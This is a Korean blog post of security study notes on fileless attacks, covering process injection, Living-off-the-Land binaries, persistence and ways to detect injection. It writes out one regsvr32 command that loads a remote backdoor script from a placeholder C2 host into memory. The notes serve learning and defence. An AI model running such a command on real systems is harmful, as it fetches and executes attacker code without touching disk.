본문 바로가기
정보보안/보안공부

파일리스(Fileless) 공격 개념/LoL이란/프로세스 인젝션

by 쭈로미 2021. 10. 20.

1. 파일리스 공격의 등장 배경

이전에 발생했던 공격같은 경우, 공격자는 디스크에 writing, 파일 생성 등을 하게 됨

→ 악성코드 분석가 등에 의해 모니터링 및 파일이 탐지될 가능성이 높음

파일 탐지 기준이 명확함 (exe, dll 등 실행 파일 내에는 올바른 키 값, 인증서 정보 등이 들어가게 되는데, 의심스러운 파일 내에는 이런 정보가 없음)

 

 

2. 파일리스 공격이란?

- 실행되는 코드가 파일로 생성되지 않고 메모리에만 존재하며, 흔적을 남기지 않는 유형의 공격

- 특징

 ① 프로세스 인젝션 기술 사용 : 정상적인 다른 프로세스에 공격자가 악성 코드나 라이브러리 등을 로딩시켜서 정상적인 프로세스의 메모리 공간 안에서만 실행이 되도록 함 → 안티바이러스 프로그램의 탐지가 어려워짐

 ② LoL 바이너리 사용 : 하기  참고

 ③ 스크립팅

 ④ Fileless persistence : persistence는 MITRE ATT&CK의 전술 중 하나로, 시스템이 재부팅 될 때 혹은 주기적으로 공격이 실행되도록 하는 것

LoL (Living Off the Land) 이란?
- 자연에서 얻을 수 있는 것들을 활용
- 새로운 악성코드, 파일 등이 아닌 원래의 것을 활용
- LoL Binaries (LoL Bins) : 대부분의 시스템에 설치되어 있으며, 별도의 수정없이 공격에 바로 사용할 수 있는 기능을 가진 정상적인 실행 파일

 

3. 파일리스 공격 예시

1) regsvr32 사용 

(* regsvr32 : dll 파일을 실행하는 빌트인 명령어, 악의적인 행위 수행 X)

- regsvr32 /s /n /u /i : http://C2/backdoor.sct    scrobj.dll(빌트인 파일)

scrobj.dll 을 regsvr32가 실행하는데, 인자값으로 인터넷상에있는 backdoor.sct 를 메모리에 로딩(디스크 터치X)

 

2) 프로세스 인젝션 기술

* 프로세스 인젝션 : 프로세스가 다른 프로세스 메모리 공간에 악성 dll이나 코드를 주입해서 실행시키는 것

예를 들어, 윈도우에서는 explorer.exe 프로세스는 PC 실행 시~종료까지 살아있는 프로세스임

이때 다른 프로세스가 explorer.exe에 악성 코드를 주입시켜놓고 본인은 죽어버림

 

- 프로세스 인젝션 탐지 방법

  . 운영체제의 파일시스템 내에서 ADS(Alternate Data Stream)을 분석하여 인젝션된 코드나 라이브러리의 흔적 찾기

  . 운영체제 라이브 아티팩트 중 네트워크 활동정보(EX. 컨넥션된 IP/도메인 등)와 관련된 프로세스의 목록을 매핑하여 인젝션된 데이터의 흔적을 찾기

  . 프로세스 인젝션에 빈번하게 사용하는 API를 실시간 모니터링

댓글